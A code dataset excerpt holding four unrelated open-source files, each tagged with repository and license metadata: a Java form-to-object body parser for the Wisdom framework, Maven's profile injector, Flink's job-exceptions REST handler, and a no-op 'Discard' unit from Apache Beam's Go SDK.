import org.apache.felix.ipojo.annotations.Instantiate;
import org.apache.felix.ipojo.annotations.Provides;
import org.apache.felix.ipojo.annotations.Requires;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.wisdom.api.content.BodyParser;
import org.wisdom.api.content.ParameterFactories;
import org.wisdom.api.http.Context;
import org.wisdom.api.http.FileItem;
import org.wisdom.api.http.MimeTypes;
import org.wisdom.content.converters.ReflectionHelper;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Type;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
@Component
@Provides
@Instantiate
public class BodyParserForm implements BodyParser {
private static final Logger LOGGER = LoggerFactory.getLogger(BodyParser.class);
private static final String ERROR_KEY = "Error parsing incoming form data for key ";
private static final String ERROR_AND = " and value ";
@Requires
ParameterFactories converters;
/**
* Creates a object of class T from a form sent in the request.
*
* @param context The context
* @param classOfT The class we expect
* @param genericType the generic type (ignored)
* @param <T> the class ot the object to build
* @return the object, {@code null} if the object cannot be built.
*/
@Override
public <T> T invoke(Context context, Class<T> classOfT, Type genericType) {
T t;
try {
t = classOfT.newInstance();
} catch (Exception e) {
LOGGER.error("Failed to create a new instance of {}", classOfT, e);
return null;
}
Map<String, ReflectionHelper.Property> properties = ReflectionHelper.getProperties(classOfT, genericType);
// 1) Query parameters
for (Entry<String, List<String>> ent : context.parameters().entrySet()) {
try {
ReflectionHelper.Property property = properties.get(ent.getKey());
if (property != null) {
Object value = converters.convertValues(ent.getValue(), property.getClassOfProperty(),
property.getGenericTypeOfProperty(),
null);
property.set(t, value);
}
} catch (Exception e) {
LOGGER.warn(ERROR_KEY + ent.getKey() + ERROR_AND + ent.getValue(), e);
}
}
// 2) Path parameters
final Map<String, String> fromPath = context.route().getPathParametersEncoded(context.request().uri());
for (Entry<String, String> ent : fromPath
.entrySet()) {
try {
ReflectionHelper.Property property = properties.get(ent.getKey());
if (property != null) {
Object value = converters.convertValue(ent.getValue(), property.getClassOfProperty(),
property.getGenericTypeOfProperty(), null);
property.set(t, value);
}
} catch (Exception e) {
// Path parameter are rarely used in form, so, set the log level to 'debug'.
LOGGER.debug(ERROR_KEY + ent.getKey() + ERROR_AND + ent.getValue(), e);
}
}
// 3) Forms.
if (context.form() == null || context.form().isEmpty()) {
return t;
}
for (Entry<String, List<String>> ent : context.form().entrySet()) {
try {
ReflectionHelper.Property property = properties.get(ent.getKey());
if (property != null) {
Object value = converters.convertValues(ent.getValue(), property.getClassOfProperty(),
property.getGenericTypeOfProperty(), null);
property.set(t, value);
}
} catch (Exception e) {
LOGGER.warn(ERROR_KEY + ent.getKey() + ERROR_AND + ent.getValue(), e);
}
}
// 4) File Items.
if (context.files() == null || context.files().isEmpty()) {
return t;
}
for (FileItem item : context.files()) {
try {
ReflectionHelper.Property property = properties.get(item.field());
if (property != null) {
if (InputStream.class.isAssignableFrom(property.getClassOfProperty())) {
property.set(t, item.stream());
} else if (FileItem.class.isAssignableFrom(property.getClassOfProperty())) {
property.set(t, item);
} else if (property.getClassOfProperty().isArray()
&& property.getClassOfProperty().getComponentType().equals(Byte.TYPE)) {
property.set(t, item.bytes());
}
}
} catch (Exception e) {
LOGGER.warn(ERROR_KEY + item.field() + ERROR_AND + item, e);
}
}
return t;
}
/**
* Creates a object of class T from a form sent in the request.
*
* @param context The context
* @param classOfT The class we expect
* @param <T> the class ot the object to build
* @return the object, {@code null} if the object cannot be built.
*/
@Override
public <T> T invoke(Context context, Class<T> classOfT) {
return invoke(context, classOfT, null);
}
/**
* Unsupported operation.
*
* @param bytes the content
* @param classOfT The class we expect
* @param <T> the class
* @return nothing as this method is not supported
*/
@Override
public <T> T invoke(byte[] bytes, Class<T> classOfT) {
throw new UnsupportedOperationException("Cannot bind a raw byte[] to a form object");
}
/**
* @return a list containing {@code application/x-www-form-urlencoded} and {@code multipart/form}.
*/
public List<String> getContentTypes() {
return ImmutableList.of(MimeTypes.FORM, MimeTypes.MULTIPART);
}
}
| torito/wisdom | core/content-manager/src/main/java/org/wisdom/content/bodyparsers/BodyParserForm.java | Java | apache-2.0 | 6,932 |
package org.apache.maven.model.profile;
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import java.util.ArrayList;
import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import javax.inject.Named;
import javax.inject.Singleton;
import org.apache.maven.model.Build;
import org.apache.maven.model.BuildBase;
import org.apache.maven.model.Model;
import org.apache.maven.model.ModelBase;
import org.apache.maven.model.Plugin;
import org.apache.maven.model.PluginContainer;
import org.apache.maven.model.PluginExecution;
import org.apache.maven.model.Profile;
import org.apache.maven.model.ReportPlugin;
import org.apache.maven.model.ReportSet;
import org.apache.maven.model.Reporting;
import org.apache.maven.model.building.ModelBuildingRequest;
import org.apache.maven.model.building.ModelProblemCollector;
import org.apache.maven.model.merge.MavenModelMerger;
/**
* Handles profile injection into the model.
*
* @author Benjamin Bentmann
*/
@Named
@Singleton
@SuppressWarnings( { "checkstyle:methodname" } )
public class DefaultProfileInjector
implements ProfileInjector
{
private ProfileModelMerger merger = new ProfileModelMerger();
@Override
public void injectProfile( Model model, Profile profile, ModelBuildingRequest request,
ModelProblemCollector problems )
{
if ( profile != null )
{
merger.mergeModelBase( model, profile );
if ( profile.getBuild() != null )
{
if ( model.getBuild() == null )
{
model.setBuild( new Build() );
}
merger.mergeBuildBase( model.getBuild(), profile.getBuild() );
}
}
}
/**
* ProfileModelMerger
*/
protected static class ProfileModelMerger
extends MavenModelMerger
{
public void mergeModelBase( ModelBase target, ModelBase source )
{
mergeModelBase( target, source, true, Collections.emptyMap() );
}
public void mergeBuildBase( BuildBase target, BuildBase source )
{
mergeBuildBase( target, source, true, Collections.emptyMap() );
}
@Override
protected void mergePluginContainer_Plugins( PluginContainer target, PluginContainer source,
boolean sourceDominant, Map<Object, Object> context )
{
List<Plugin> src = source.getPlugins();
if ( !src.isEmpty() )
{
List<Plugin> tgt = target.getPlugins();
Map<Object, Plugin> master = new LinkedHashMap<>( tgt.size() * 2 );
for ( Plugin element : tgt )
{
Object key = getPluginKey().apply( element );
master.put( key, element );
}
Map<Object, List<Plugin>> predecessors = new LinkedHashMap<>();
List<Plugin> pending = new ArrayList<>();
for ( Plugin element : src )
{
Object key = getPluginKey().apply( element );
Plugin existing = master.get( key );
if ( existing != null )
{
mergePlugin( existing, element, sourceDominant, context );
if ( !pending.isEmpty() )
{
predecessors.put( key, pending );
pending = new ArrayList<>();
}
}
else
{
pending.add( element );
}
}
List<Plugin> result = new ArrayList<>( src.size() + tgt.size() );
for ( Map.Entry<Object, Plugin> entry : master.entrySet() )
{
List<Plugin> pre = predecessors.get( entry.getKey() );
if ( pre != null )
{
result.addAll( pre );
}
result.add( entry.getValue() );
}
result.addAll( pending );
target.setPlugins( result );
}
}
@Override
protected void mergePlugin_Executions( Plugin target, Plugin source, boolean sourceDominant,
Map<Object, Object> context )
{
List<PluginExecution> src = source.getExecutions();
if ( !src.isEmpty() )
{
List<PluginExecution> tgt = target.getExecutions();
Map<Object, PluginExecution> merged =
new LinkedHashMap<>( ( src.size() + tgt.size() ) * 2 );
for ( PluginExecution element : tgt )
{
Object key = getPluginExecutionKey().apply( element );
merged.put( key, element );
}
for ( PluginExecution element : src )
{
Object key = getPluginExecutionKey().apply( element );
PluginExecution existing = merged.get( key );
if ( existing != null )
{
mergePluginExecution( existing, element, sourceDominant, context );
}
else
{
merged.put( key, element );
}
}
target.setExecutions( new ArrayList<>( merged.values() ) );
}
}
@Override
protected void mergeReporting_Plugins( Reporting target, Reporting source, boolean sourceDominant,
Map<Object, Object> context )
{
List<ReportPlugin> src = source.getPlugins();
if ( !src.isEmpty() )
{
List<ReportPlugin> tgt = target.getPlugins();
Map<Object, ReportPlugin> merged =
new LinkedHashMap<>( ( src.size() + tgt.size() ) * 2 );
for ( ReportPlugin element : tgt )
{
Object key = getReportPluginKey().apply( element );
merged.put( key, element );
}
for ( ReportPlugin element : src )
{
Object key = getReportPluginKey().apply( element );
ReportPlugin existing = merged.get( key );
if ( existing == null )
{
merged.put( key, element );
}
else
{
mergeReportPlugin( existing, element, sourceDominant, context );
}
}
target.setPlugins( new ArrayList<>( merged.values() ) );
}
}
@Override
protected void mergeReportPlugin_ReportSets( ReportPlugin target, ReportPlugin source, boolean sourceDominant,
Map<Object, Object> context )
{
List<ReportSet> src = source.getReportSets();
if ( !src.isEmpty() )
{
List<ReportSet> tgt = target.getReportSets();
Map<Object, ReportSet> merged = new LinkedHashMap<>( ( src.size() + tgt.size() ) * 2 );
for ( ReportSet element : tgt )
{
Object key = getReportSetKey().apply( element );
merged.put( key, element );
}
for ( ReportSet element : src )
{
Object key = getReportSetKey().apply( element );
ReportSet existing = merged.get( key );
if ( existing != null )
{
mergeReportSet( existing, element, sourceDominant, context );
}
else
{
merged.put( key, element );
}
}
target.setReportSets( new ArrayList<>( merged.values() ) );
}
}
}
}
| olamy/maven | maven-model-builder/src/main/java/org/apache/maven/model/profile/DefaultProfileInjector.java | Java | apache-2.0 | 9,121 |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.flink.runtime.rest.handler.job;
import org.apache.flink.annotation.VisibleForTesting;
import org.apache.flink.api.common.time.Time;
import org.apache.flink.runtime.execution.ExecutionState;
import org.apache.flink.runtime.executiongraph.AccessExecutionVertex;
import org.apache.flink.runtime.executiongraph.ArchivedExecutionGraph;
import org.apache.flink.runtime.executiongraph.ErrorInfo;
import org.apache.flink.runtime.rest.handler.HandlerRequest;
import org.apache.flink.runtime.rest.handler.legacy.ExecutionGraphCache;
import org.apache.flink.runtime.rest.messages.EmptyRequestBody;
import org.apache.flink.runtime.rest.messages.JobExceptionsInfo;
import org.apache.flink.runtime.rest.messages.JobExceptionsInfoWithHistory;
import org.apache.flink.runtime.rest.messages.JobIDPathParameter;
import org.apache.flink.runtime.rest.messages.MessageHeaders;
import org.apache.flink.runtime.rest.messages.ResponseBody;
import org.apache.flink.runtime.rest.messages.job.JobExceptionsMessageParameters;
import org.apache.flink.runtime.rest.messages.job.UpperLimitExceptionParameter;
import org.apache.flink.runtime.scheduler.ExecutionGraphInfo;
import org.apache.flink.runtime.scheduler.exceptionhistory.ExceptionHistoryEntry;
import org.apache.flink.runtime.scheduler.exceptionhistory.RootExceptionHistoryEntry;
import org.apache.flink.runtime.taskmanager.TaskManagerLocation;
import org.apache.flink.runtime.webmonitor.RestfulGateway;
import org.apache.flink.runtime.webmonitor.history.ArchivedJson;
import org.apache.flink.runtime.webmonitor.history.JsonArchivist;
import org.apache.flink.runtime.webmonitor.retriever.GatewayRetriever;
import org.apache.flink.util.Preconditions;
import org.apache.flink.shaded.curator5.com.google.common.collect.Iterables;
import javax.annotation.Nullable;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.concurrent.Executor;
import java.util.stream.Collectors;
import java.util.stream.StreamSupport;
/** Handler serving the job exceptions. */
public class JobExceptionsHandler
extends AbstractExecutionGraphHandler<
JobExceptionsInfoWithHistory, JobExceptionsMessageParameters>
implements JsonArchivist {
static final int MAX_NUMBER_EXCEPTION_TO_REPORT = 20;
public JobExceptionsHandler(
GatewayRetriever<? extends RestfulGateway> leaderRetriever,
Time timeout,
Map<String, String> responseHeaders,
MessageHeaders<
EmptyRequestBody,
JobExceptionsInfoWithHistory,
JobExceptionsMessageParameters>
messageHeaders,
ExecutionGraphCache executionGraphCache,
Executor executor) {
super(
leaderRetriever,
timeout,
responseHeaders,
messageHeaders,
executionGraphCache,
executor);
}
@Override
protected JobExceptionsInfoWithHistory handleRequest(
HandlerRequest<EmptyRequestBody> request, ExecutionGraphInfo executionGraph) {
List<Integer> exceptionToReportMaxSizes =
request.getQueryParameter(UpperLimitExceptionParameter.class);
final int exceptionToReportMaxSize =
exceptionToReportMaxSizes.size() > 0
? exceptionToReportMaxSizes.get(0)
: MAX_NUMBER_EXCEPTION_TO_REPORT;
return createJobExceptionsInfo(executionGraph, exceptionToReportMaxSize);
}
@Override
public Collection<ArchivedJson> archiveJsonWithPath(ExecutionGraphInfo executionGraphInfo)
throws IOException {
ResponseBody json =
createJobExceptionsInfo(executionGraphInfo, MAX_NUMBER_EXCEPTION_TO_REPORT);
String path =
getMessageHeaders()
.getTargetRestEndpointURL()
.replace(
':' + JobIDPathParameter.KEY,
executionGraphInfo.getJobId().toString());
return Collections.singletonList(new ArchivedJson(path, json));
}
private static JobExceptionsInfoWithHistory createJobExceptionsInfo(
ExecutionGraphInfo executionGraphInfo, int exceptionToReportMaxSize) {
final ArchivedExecutionGraph executionGraph =
executionGraphInfo.getArchivedExecutionGraph();
if (executionGraph.getFailureInfo() == null) {
return new JobExceptionsInfoWithHistory(
createJobExceptionHistory(
executionGraphInfo.getExceptionHistory(), exceptionToReportMaxSize));
}
List<JobExceptionsInfo.ExecutionExceptionInfo> taskExceptionList = new ArrayList<>();
boolean truncated = false;
for (AccessExecutionVertex task : executionGraph.getAllExecutionVertices()) {
Optional<ErrorInfo> failure = task.getFailureInfo();
if (failure.isPresent()) {
if (taskExceptionList.size() >= exceptionToReportMaxSize) {
truncated = true;
break;
}
TaskManagerLocation location = task.getCurrentAssignedResourceLocation();
String locationString = toString(location);
long timestamp = task.getStateTimestamp(ExecutionState.FAILED);
taskExceptionList.add(
new JobExceptionsInfo.ExecutionExceptionInfo(
failure.get().getExceptionAsString(),
task.getTaskNameWithSubtaskIndex(),
locationString,
timestamp == 0 ? -1 : timestamp));
}
}
final ErrorInfo rootCause = executionGraph.getFailureInfo();
return new JobExceptionsInfoWithHistory(
rootCause.getExceptionAsString(),
rootCause.getTimestamp(),
taskExceptionList,
truncated,
createJobExceptionHistory(
executionGraphInfo.getExceptionHistory(), exceptionToReportMaxSize));
}
private static JobExceptionsInfoWithHistory.JobExceptionHistory createJobExceptionHistory(
Iterable<RootExceptionHistoryEntry> historyEntries, int limit) {
// we need to reverse the history to have a stable result when doing paging on it
final List<RootExceptionHistoryEntry> reversedHistoryEntries = new ArrayList<>();
Iterables.addAll(reversedHistoryEntries, historyEntries);
Collections.reverse(reversedHistoryEntries);
List<JobExceptionsInfoWithHistory.RootExceptionInfo> exceptionHistoryEntries =
reversedHistoryEntries.stream()
.limit(limit)
.map(JobExceptionsHandler::createRootExceptionInfo)
.collect(Collectors.toList());
return new JobExceptionsInfoWithHistory.JobExceptionHistory(
exceptionHistoryEntries,
exceptionHistoryEntries.size() < reversedHistoryEntries.size());
}
private static JobExceptionsInfoWithHistory.RootExceptionInfo createRootExceptionInfo(
RootExceptionHistoryEntry historyEntry) {
final List<JobExceptionsInfoWithHistory.ExceptionInfo> concurrentExceptions =
StreamSupport.stream(historyEntry.getConcurrentExceptions().spliterator(), false)
.map(JobExceptionsHandler::createExceptionInfo)
.collect(Collectors.toList());
if (historyEntry.isGlobal()) {
return new JobExceptionsInfoWithHistory.RootExceptionInfo(
historyEntry.getException().getOriginalErrorClassName(),
historyEntry.getExceptionAsString(),
historyEntry.getTimestamp(),
concurrentExceptions);
}
assertLocalExceptionInfo(historyEntry);
return new JobExceptionsInfoWithHistory.RootExceptionInfo(
historyEntry.getException().getOriginalErrorClassName(),
historyEntry.getExceptionAsString(),
historyEntry.getTimestamp(),
historyEntry.getFailingTaskName(),
toString(historyEntry.getTaskManagerLocation()),
concurrentExceptions);
}
private static JobExceptionsInfoWithHistory.ExceptionInfo createExceptionInfo(
ExceptionHistoryEntry exceptionHistoryEntry) {
assertLocalExceptionInfo(exceptionHistoryEntry);
return new JobExceptionsInfoWithHistory.ExceptionInfo(
exceptionHistoryEntry.getException().getOriginalErrorClassName(),
exceptionHistoryEntry.getExceptionAsString(),
exceptionHistoryEntry.getTimestamp(),
exceptionHistoryEntry.getFailingTaskName(),
toString(exceptionHistoryEntry.getTaskManagerLocation()));
}
private static void assertLocalExceptionInfo(ExceptionHistoryEntry exceptionHistoryEntry) {
Preconditions.checkArgument(
exceptionHistoryEntry.getFailingTaskName() != null,
"The taskName must not be null for a non-global failure.");
}
@VisibleForTesting
static String toString(@Nullable TaskManagerLocation location) {
// '(unassigned)' being the default value is added to support backward-compatibility for the
// deprecated fields
return location != null
? taskManagerLocationToString(location.getFQDNHostname(), location.dataPort())
: "(unassigned)";
}
@VisibleForTesting
@Nullable
static String toString(@Nullable ExceptionHistoryEntry.ArchivedTaskManagerLocation location) {
return location != null
? taskManagerLocationToString(location.getFQDNHostname(), location.getPort())
: null;
}
private static String taskManagerLocationToString(String fqdnHostname, int port) {
return String.format("%s:%d", fqdnHostname, port);
}
}
| apache/flink | flink-runtime/src/main/java/org/apache/flink/runtime/rest/handler/job/JobExceptionsHandler.java | Java | apache-2.0 | 11,142 |
// Licensed to the Apache Software Foundation (ASF) under one or more
// contributor license agreements. See the NOTICE file distributed with
// this work for additional information regarding copyright ownership.
// The ASF licenses this file to You under the Apache License, Version 2.0
// (the "License"); you may not use this file except in compliance with
// the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package exec
import "context"
// Discard silently discard all elements. It is implicitly inserted for any
// loose ends in the pipeline.
type Discard struct {
// UID is the unit identifier.
UID UnitID
}
func (d *Discard) ID() UnitID {
return d.UID
}
func (d *Discard) Up(ctx context.Context) error {
return nil
}
func (d *Discard) StartBundle(ctx context.Context, id string, data DataContext) error {
return nil
}
func (d *Discard) ProcessElement(ctx context.Context, value FullValue, values ...ReStream) error {
return nil
}
func (d *Discard) FinishBundle(ctx context.Context) error {
return nil
}
func (d *Discard) Down(ctx context.Context) error {
return nil
}
func (d *Discard) String() string {
return "Discard"
}
| rangadi/beam | sdks/go/pkg/beam/core/runtime/exec/discard.go | GO | apache-2.0 | 1,532 |